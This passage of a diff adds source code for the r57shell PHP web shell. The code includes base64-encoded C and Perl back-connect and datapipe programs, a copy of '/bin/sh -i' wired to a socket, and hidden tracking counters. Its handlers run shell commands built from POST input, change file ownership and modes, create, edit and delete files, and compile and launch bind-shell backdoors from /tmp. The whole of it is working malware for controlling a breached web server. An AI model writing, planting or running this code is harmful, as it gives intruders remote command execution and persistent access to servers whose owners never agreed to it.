+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+/* --- END Back connect source C ------------------------------------------------------------------------------- */
+/* --- datapipe.c ---------------------------------------------------------------------------------------------- */
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+/* --- END datapipe.c ------------------------------------------------------------------------------------------ */
+/* --- datapipe.pl --------------------------------------------------------------------------------------------- */
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+/* --- END datapipe.pl ----------------------------------------------------------------------------------------- */
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+/*** END base64 ------------------------------------------------------------------------------------------------ */
+
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* LOGO + info */
+echo $head;
+echo '</head>
+<body bgcolor="#e4e0d8">
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160>
+<!-- logo -->
+<font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+$si = 3;
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("safe_mode: <b>ON</b>"):("safe_mode: <b>OFF</b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b>ON (".@curl_version().")</b>"):("<b>OFF</b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on)
+ {
+ $client_api = @function_exists('mysql_get_client_info') ? @mysql_get_client_info() : "";
+ echo "ON ($client_api)</b>";
+ }
+else
+ {
+ echo "OFF</b>";
+ }
+echo "<br>".ws(2);
+echo "Disable functions : <b>";
+$df = @ini_get('disable_functions');
+if(empty($df)) echo "NONE</b>"; else echo "$df</b>";
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* display information */
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('/sbin/sysctl -n kern.ostype');
+$bsd2 = ex('/sbin/sysctl -n kern.osrelease');
+$lin1 = ex('/sbin/sysctl -n kernel.ostype');
+$lin2 = ex('/sbin/sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir."<br>";
+echo "</font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f  = base64_decode($c1);
+$f .= base64_decode($c2);
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* find text */
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* chmod/chown/chgrp */
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* make */
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* edit file */
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name size=85 value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd size=85 value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* save file */
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* port bind C */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* port bind Perl */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* back connect Perl */
